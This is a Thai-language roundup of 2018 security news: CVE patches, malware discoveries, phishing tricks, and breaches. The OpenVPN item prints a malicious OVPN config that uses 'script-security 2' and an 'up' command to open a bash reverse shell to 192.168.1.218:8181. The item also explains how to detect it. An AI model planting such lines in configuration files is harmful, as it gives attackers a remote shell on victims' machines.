โครงการ phpMyAdmin ประกาศแพตช์ช่องโหว่ความปลอดภัยรหัส CVE-2018-12581 และ CVE-2018-12613 เมื่อปลายสัปดาห์ที่ผ่านมา โดยช่องโหว่ที่มีการประกาศแพตช์นั้นมีทั้งช่องโหว่ประเภท XSS, LFI และ RCE

ช่องโหว่แรกรหัส CVE-2018-12581 ถูกค้นพบโดย William Desportes โดยค้นพบช่องโหว่ XSS ในฟีเจอร์ Designer ซึ่งส่งผลให้ผู้โจมตีสามารถสร้างการโจมตีที่เป็นอันตรายที่จะถูกสั่งให้ทำงานโดยผู้ใช้งานผ่านทางฟิลด์ชื่อของฐานข้อมูลได้

ช่องโหว่ที่สองรหัส CVE-2018-12613 ถูกค้นพบโดย Huang Henry โดยเป็นช่องโหว่แบบ LFI ที่ผู้โจมตีจำเป็นต้องมีการพิสูจน์ตัวตนกับระบบก่อน ช่องโหว่นี้มีที่มาจากการที่ phpMyAdmin ในไฟล์ที่ผู้ใช้งานมาอัปโหลดและทำการแสดงผล รวมไปถึงปัญหาในการ whitelist ของซอฟต์แวร์เองซึ่งทำให้เกิดการรันโค้ดที่เป็นอันตรายได้
สำหรับช่องโหว่รหัส CVE-2018-12613 ผู้ใช้งานซอฟต์แวร์สามารถป้องกันการโจมตีในเบื้องต้นได้โดยการตั้งค่า "open_basedir", "$cfg['AllowArbitraryServer'] " และ "$cfg['ServerDefault']" อย่างเหมาะสม

ดำเนินการอัปเดตซอฟต์แวร์ phpMyAdmin ไปเป็นเวอร์ชันที่มีการแพตช์แล้วคือเวอร์ชัน 4.8.2 โดยด่วน

ที่มา : phpMyAdmin

ทีมนักวิจัยด้านความปลอดภัยจาก AlienVault ประกาศการค้นพบมัลแวร์ตัวใหม่ภายใต้ชื่อ GZipDe ซึ่งเชื่อกันว่าเป็นมัลแวร์ที่มีเป้าหมายอย่างเฉพาะเจาะจง (targeted attack) เพื่อการจารกรรมข้อมูล

AlienVault ค้นพบมัลแวร์ครั้งแรกจากไฟล์ที่ถูกอัปโหลดขึ้นมาสแกนบนเซอร์วิสของ VirusTotal โดยไฟล์ดังกล่าวเป็นไฟล์เอกสาร Word ซึ่งเมื่อถูกรันแล้วจะทำการดาวโหลดและติตตั้งมัลแวร์ GZipDe ลงไป ไฟล์ดังกล่าวมีที่มาจากผู้ใช้งานในอีฟกานิสถานซึ่งในขณะนี้ยังไม่สามารถระบุลงลึกไปได้ว่าเป้าหมายในการโจมตีครั้งนี้เป็นใครหรือองค์กรใด

มัลแวร์ GZipDe มีจุดน่าสนใจในโมดูล RAT เมื่อ payload ที่มีที่มาจากไฟล์เอกสาร Word ถูกถอดรหัสและถูกเรียกใช้งานบนหน่วยความจำแล้ว มันจะทำการดาวโหลดโมดูล RAT ซึ่งแท้จริงคือโมดูลแบ็คดอร์ของชุดโปรแกรมสำหรับทดสอบเจาะระบบ Metasploit

การใช้งานซอฟต์แวร์ในการทดสอบเจาะระบบในการโจมตีจริงนั้นไม่ใช่สิ่งใหม่ เนื่องจากกลุ่มผู้โจมตีและ APT หลายประเภทก็มีการใช้ซอฟต์แวร์ อาทิ Metasploit หรือ Cobalt Strike ในกระบวนการโจมตีและฝังตัวในระบบเช่นเดียวกัน

ที่มา : BLEEPINGCOMPUTER

ผู้เชี่ยวชาญด้านความปลอดภัยของ Android กำลังเตือนผู้ใช้ว่า มีนักพัฒนาแอนดรอยด์บางคนหลอกล่อให้ผู้ใช้ติดตั้งแอปของตนโดยการลงทะเบียนบัญชีนักพัฒนาซอฟต์แวร์ Google Play Store เป็นจำนวนการ installs เช่น "1 million installs," Installs 1,000,000," "100,000,000 Downloads," "5,000,000+," "1,000,000,000" และอื่นๆที่รูปแบบคล้ายกัน ทำให้ผู้ใช้งานเผลอติดตั้งแอปผิดพลาดอย่างไม่ได้ตั้งใจ

เทคนิคนี้เป็นวิธีที่ง่าย แต่มีประสิทธิภาพในการทำให้ผู้ใช้เข้าใจผิดโดยเฉพาะอย่างยิ่งผู้ที่เลือกแอปตามความนิยม แม้แอปเหล่านี้จะไม่มีอันตราย แต่ก็อาจถูกใช้แพร่เชื้อมัลแวร์ในอนาคตได้อย่างง่ายดาย โชคดีที่เทคนิคนี้ยังง่ายต่อการตรวจสอบหากผู้ใช้ระวังในใช้ Google Play Store นักวิจัยมัลแวร์จาก ESET "Lukas Stefanko" ออกมาเปิดเผยเทคนิคใหม่ที่ผู้พัฒนามัลแวร์บนแอนดรอยด์ใช้เพื่อหลอกผู้ใช้ว่าแอปมีความน่าเชื่อถือ โดยมีจุดประสงค์เพื่อให้ผู้ใช้หลงเชื่อและติดตั้งแอปที่เป็นมัลแวร์

เทคนิคนี้อาศัยการสมัครบัญชีสำหรับนักพัฒนาแอปที่สามารถส่งแอปขึ้นไปบน Google Play Store ได้ โดยแทนที่จะใส่ชื่อของนักพัฒนาแอปจริงๆ ลงไปในบัญชี ผู้ร้ายจะทำการเปลี่ยนชื่อเป็น "1 million installs," Installs 1,000,000," "100,000,000 Downloads," "5,000,000+," "1,000,000,000" แทน ซึ่งเมื่อแอปถูกนำขึ้น Google Play Store ในส่วนของชื่อของผู้พัฒนาแอปจะถูกแทนที่ด้วยคำในลักษณะนี้ และทำให้ผู้ใช้งานหลงเชื่อว่าเป็นแอปจริงได้

สิ่งที่ต้องคำนึงถึง เมื่อติดตั้งแอป
- Google จะใส่ข้อมูลที่เป็นทางการในช่องพิเศษบนหน้า Play สโตร์ของแอปเท่านั้น
- หมายเลขจำนวนการ install ของ Google จะปรากฏในส่วน "ข้อมูลเพิ่มเติม" ที่ด้านล่างของหน้า Play สโตร์ของแต่ละแอป
- หากจำนวนการ install มีน้อย แต่ผู้พัฒนาอ้างเหตุผลต่างๆนาๆที่ไม่ชอบมาพากล แอปจะเป็นอันตรายอย่างเห็นได้ชัด
- Google Play ไม่มีป้าย "Verified" ดังนั้นอย่าเชื่อว่านักพัฒนาแอปอาจอ้างสิทธิ์ในไอคอนแอปของตน
- อ่านบทวิจารณ์ของผู้ใช้ก่อนดาวน์โหลดแอปทุกครั้ง ผู้ใช้งานควรตรวจสอบที่มาของแอปอย่างถี่ถ้วนทุกครั้งก่อนติดตั้งแอปใดๆ และควรสังเกตความผิดปกติของแอป เช่น โลโก้, คอมเมนต์รีวิว หรือชื่อของผู้พัฒนาก่อนที่จะติดตั้งแอปเสมอ

ที่มา : bleepingcomputer

Cisco ประกาศแพตช์ช่องโหว่ด้านความปลอดภัยซึ่งปิดช่องโหว่กว่า 34 รายการสำหรับแพตช์ประจำเดือนมิถุนายน 2561 โดยมี 7 รายการเป็นช่องโหว่ระดับวิกฤติใน NX-OS และ FXOS ซึ่งส่งผลให้ผู้โจมตีสามารถรันคำสั่งที่เป็นอันตรายเพื่อโจมตีอุปกรณ์ได้จากระยะไกล

สำหรับช่องโหว่ระดับวิกฤติ 4 จาก 7 ช่องโหว่ที่ส่งผลกระทบ NX-OS และ FXOS ล้วนแล้วแต่มีที่มีจาก Cisco Fabric Services และมีคะแนน CVSSv3 สูงถึง 9.8/10 คะแนน ที่มาของช่องโหว่ทั้ง 4 รายการนี้เกิดการที่ Cisco Fabric Services นั้นไม่มีการตรวจสอบแพ็คเกตที่ถูกส่งมาอย่างเหมาะสมพอ ทำให้ผู้โจมตีสามารถสร้างแพ็คเกตพิเศษและส่งตรงมาถึงอุปกรณ์ที่มีช่องโหว่เพื่อรันโค้ดที่เป็นอันตรายได้โดยตรง หรือทำให้อุปกรณ์ไม่สามารถให้บริการได้

Recommendation แนะนำให้ผู้ดูแลระบบตรวจสอบรายการช่องโหว่ทั้งหมดที่มีการเปิดเผยในเดือนนี้อีกครั้งจากลิงค์ด้านล่าง รวมไปถึงทำการแพตช์เพื่อป้องกันการโจมตีช่องโหว่เหล่านี้
https://tools.

Jacob Baines วิศวกรด้านความปลอดภัยจาก Tenable ได้แสดงเทคนิคการโจมตีใหม่โดยอาศัยการแก้ไขไฟล์การตั้งค่าของ OpenVPN เพื่อสอดแทรกคำสั่งที่เป็นอันตรายลงไป โดยเมื่อไฟล์ดังกล่าวถูกรันโดย OpenVPN คำสั่งที่ถูกสอดแทรกลงไปก็จะสามารถรันในเครื่องของเหยื่อ ซึ่งอาจส่งผลให้เกิดการรันคำสั่งเป็นอันตรายขึ้นมาได้

ในตัวอย่างการโจมตีของ Jacob Baines สิ่งที่ผู้โจมตีจำเป็นต้องทำคือการเพิ่มบรรทัด "script-security 2" ลงในไฟล์ OVPN ก่อนจะเพิ่ม up "cmd" ตามด้วยคำสั่งที่จะรันในระบบของเหยื่อ คำสั่ง script-security 2 จะทำให้ OpenVPN รันโค้ดที่ผู้ใช้กำหนดได้เองซึ่งหมายถึงคำสั่งในบรรทัด up "cmd" ได้ ตัวอย่างของการแก้ไขมีรายละเอียด้านล่าง โดยเป็นการสร้างการเชื่อมต่อกลับไปยังระบบของผู้โจมตี เปิดช่องทางให้ผู้โจมตีทำการควบคุมได้

script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0&1&’”

การโจมตีนี้สามารถถูกสังเกตได้หลายวิธีการ อาทิ การตรวจสอบที่ไฟล์ OVPN หรือการตรวจสอบจากหน้าต่างของ OpenVPN เมื่อมีการเชื่อมต่อซึ่งจะแสดงให้เห็นคำสั่งที่เป็นอันตรายที่ถูกรันอย่างชัดเจน

ที่มา : bleepingcomputer

เว็บไซต์สำหรับแลกเปลี่ยน cryptocurrency จากเกาหลีใต้ "Bithumb" ถูกแฮกเป็นครั้งที่สองในรอบปี โดยในครั้งนี้นั้นผู้โจมตีประสบความสำเร็จที่จะขโมยเงินกว่า 31.6 ล้านดอลลาร์สหรัฐฯ ออกจากระบบ

ในขณะนี้ Bithumb ยังไม่ได้มีประกาศอย่างเป็นทางการว่าการโจมตีนั้นเกิดขึ้นได้อย่างไร ผู้โจมตีมีวิธีการนำเงินออกจากระบบได้อย่างไรและมีสกุลเงินใดที่ได้รับผลกระทบบ้าง อย่างไรก็ตามมีผู้ใช้งานหลายรายที่ค้นพบว่าเงินในสกุล Ripple ของตัวเองนั้นหายไป

อย่างไรก็ตามอ้างอิงจากประกาศอย่างเป็นทางการของ Bithumb ทางเว็บไซต์ได้ทำการโยกข้อมูลทั้งหมดไปไว้ใน cold wallet แล้ว และจะทำการตรวจสอบและแก้ไขช่องโหว่ในระบบก่อนที่จะดำเนินการ refund เงินที่ถูกขโมยไปให้กับผู้ใช้งาน

ที่มา : cyberscoop

บริษัทด้าน Cloud Security "Avanan" ประกาศการค้นพบเทคนิคใหม่ "Zerofont" ซึ่งช่วยผู้โจมตีสามารถข้ามผ่านกระบวนการตรวจสอบอีเมลเมื่อส่งอีเมลที่เป็นอันตรายไปหาผู้ใช้งานได้

เทคนิค ZeroFont นั้นอาศัยหลักการของแทรก "ข้อความที่ถูกซ่อน" ลงไปในส่วนเนื้อหาของอีเมลที่เป็นอันตราย โดยข้อความที่ถูกซ่อนนี้จะใช้วิธีการซ่อนโดยการตั้งขนาดของตัวอักษรให้เป็น 0 ซึ่งเมื่อถูกตรวจสอบด้วยคอมพิวเตอร์แล้วอาจเห็นข้อความที่แตกต่างกันออกไปจากที่ผู้ใช้งานเห็น

ยังไม่มีการระบุว่าไมโครซอฟต์ได้รับทราบและแก้ไขปัญหานี้ไปแล้วหรือไม่ อย่างไรก็ตามผู้ใช้งานควรระมัดระวังและตรวจสอบที่มาของอีเมลทุกครั้งนอกเหนือจากการตรวจสอบเนื้อหาของอีเมลโดยทั่วไปเพื่อป้องกันการถูกโจมตีในลักษณะนี้

ที่มา : thehackernews

นักพัฒนาจากทีม Google Chrome "Jake Archibald" ค้นพบช่องโหว่ด้านความปลอดภัย "Wavethrough" ในเบราว์เซอร์รุ่นใหม่ๆ ซึ่งส่งผลให้เว็บไซต์ที่ถูกเปิดอยู่ในโปรแกรมเว็บเบราว์เซอร์เดียวกันในขณะนั้นสามารถเข้าถึงข้อมูลระหว่างกันได้

โดยปกตินั้นเมื่อผู้ใช้งานเข้าชมเว็บไซต์ เบราว์เซอร์จะไม่ได้รับอนุญาตให้เรียกดูข้อมูลของเว็บไซต์อื่นๆ ที่ไม่ได้มีที่มาจากเว็บไซต์ที่ผู้ใช้งานเข้าชมอยู่ อย่างไรก็ตามช่องโหว่ Wavethrough นั้นเกิดขึ้นในกรณีของการเรียกหาข้อมูลในลักษณะที่เป็นไฟล์เสียงหรือไฟล์วีดิโอ ที่สามารถถูกเรียกข้ามเว็บไซต์ได้อย่างไม่มีเงื่อนไข

การเรียกหาข้อมูลที่เป็นไฟล์เสียงหรือไฟล์วีดิโอสามารถถูกเรียกได้เป็นส่วนๆ ในกรณีที่ไฟล์อาจมีขนาดใหญ่ เมื่อส่วนย่อยๆ ถูกเรียกและถูกใช้งานจนเกือบครบ เบราว์เซอร์จะพยายามค้นหาชิ้นส่วนต่อไปของไฟล์เพื่อที่จะเรียกและนำมาใช้งานใหม่ อย่างไรก็ตามการเรียกหาข้อมูลแบบเป็นส่วนๆ นี้กลับไม่ได้ถูกครอบคลุมโดยมาตรฐานความปลอดภัยที่ดีพอ ทำให้เกิดการนำไปพัฒนาที่แตกต่างกันและเกิดเป็นช่องโหว่ขึ้นมาได้

Jake Archibald ค้นพบช่องโหว่ Wavethrough ใน Microsoft Edge และ Mozilla Firefox ซึ่งทำให้การเรียกส่วนของข้อมูลนั้นสามารถูกบังคับให้เป็นการเรียกข้ามขอบเขตที่ควรจะเป็น หรือเรียกข้ามเว็บไซต์ได้ โดย Jake ได้แสดงตัวอย่างการโจมตีซึ่งทำให้เขาสามารถดึงข้อมูลของเว็บไซต์ที่มีการล็อกอินค้างอยู่ในโปรแกรมเว็บเบราว์เซอร์ได้

Recommendation : ในขณะนี้ช่องโหว่ดังกล่าวซึ่งตรวจพบใน Microsoft Edge และ Mozilla Firefox ได้ถูกแพตช์แล้ว แนะนำให้ผู้ใช้งานดำเนินการอัปเดตโปรแกรมเว็บเบราว์เซอร์ให้เป็นเวอร์ชันล่าสุดเพื่อรับแพตช์ช่องโหว่โดยด่วน
Affected Platform : Microsoft Edge และ Mozilla Firefox

ที่มา : thehackernews

Banco de Chile ธนาคารที่ใหญ่ที่สุดในชิลีตกเป็นเป้าหมายในการโจมตีทางไซเบอร์เมื่อวันที่ 24 พฤษภาคมที่ผ่านมา โดยผู้โจมตีมีการใช้มัลแวร์ KillDisk ในการโจมตีระบบซึ่งเชื่อกันว่าเพื่ออำพรางปฏิบัติการในขโมยเงินออกจากระบบ SWIFT ของธนาคาร

มัลแวร์ KillDisk เป็นมัลแวร์ที่ถูกพัฒนาขึ้นเพื่อเขียนทับข้อมูลในส่วน Master Boot Record (MBR) ซึ่งส่งผลให้คอมพิวเตอร์ไม่สามารถใช้งานได้ โดย KillDisk เป็นที่รู้จักกันในวงกว้างเนื่องมันถูกนำมาใช้ในรูปแบบของมัลแวร์เรียกค่าไถ่ด้วย

อย่างไรก็ตามในกรณีของ Banco de Chile ทาง Trend Micro ซึ่งเป็นผู้ตรวจพบการแพร่กระจายของ KillDisk ในแถบละตินอเมริกากล่าวว่า KillDisk ที่ตรวจพบในครั้งนี้นั้นอาจเป็น KillDisk ในเวอร์ชันใหม่เนื่องจากไม่ได้มีการแสดงข้อความขู่เรียกค่าไถ่และอาจมีเป้าหมายเพียงอย่างเดียวในการทำให้ระบบคอมพิวเตอร์ไม่สามารถใช้งานได้

Trend Micro ได้ให้ข้อมูลเพิ่มเติมอีกด้วยว่า สายพันธุ์ของมัลแวร์ KillDisk สายพันธุ์ใหม่นี้มีความเชื่อมโยงกับกลุ่มแฮกเกอร์ซึ่งเคยพยายามขโมยเงินจากธนาคารเม็กซิกัน Bancomext กว่า 110 ล้านดอลลาร์สหรัฐฯ ด้วย

ล่าสุดในวันที่ 9 มิถุนายนที่ผ่านมา Banco de Chile ได้ออกมาประกาศอย่างเป็นทางการว่ากลุ่มผู้โจมตีได้ขโมยเงินออกไปจากระบบกว่า 10 ล้านดอลลาร์สหรัฐฯ ในช่วงที่ KillDisk แพร่กระจายในระบบจริง แต่ยังไม่มีการระบุว่ามีพฤติกรรมการโจมตีในลักษณะใดในตอนนี้

ที่มา : bleepingcomputer

ESET ประกาศการค้นพบมัลแวร์ลักลอบขโมยข้อมูล "InvisiMole" ซึ่งแพร่กระจายในรัสเซียและยูเครนวันนี้ โดยเชื่อกันว่าเป็นมัลแวร์ที่ถูกใช้ในการจารกรรมทางไซเบอร์เนื่องจากความซับซ้อนและความสามารถของมัลแวร์ที่หลากหลายและทำให้มัลแวร์ถูกตรวจจับได้ยาก

อ้างอิงจากรายงานของ ESET มัลแวร์ InvisiMole แพร่กระจายมาตั้งแต่ปี 2013 โดยมีเป้าหมายค่อนข้างจำกัดซึ่งทำให้ตรวจจับได้ยาก มัลแวร์รองรับการควบคุมจากกลุ่มผู้โจมตีเพื่อทำให้ทำตามคำสั่งที่ต้องการซึ่งรวมไปถึงแอบเปิดไมโครโฟนเพื่อดันเสียง แอบเปิดกล้องเว็บแคมเพื่อถ่ายรูป นอกเหนือจากนั้นยังแก้ไขการตั้งค่าของระบบได้อย่างอิสระ

ไม่มีการระบุถึงช่องทางในการแพร่กระจายของมัลแวร์ InvisiMole ในขณะนี้

ทาง ESET ยืนยันว่าในขณะนี้การแพร่กระจายของ InvisiMole ยังอยู่ในขอบเขตที่จำกัดมากๆ แต่ก็แนะนำให้ผู้ใช้งานหมั่นทำการอัปเดตระบบให้มีความทันสมัยอยู่เสมอ รวมไปถึงฐานข้อมูลเพื่อตรวจจับมัลแวร์ด้วย

ที่มา : bleepingcomputer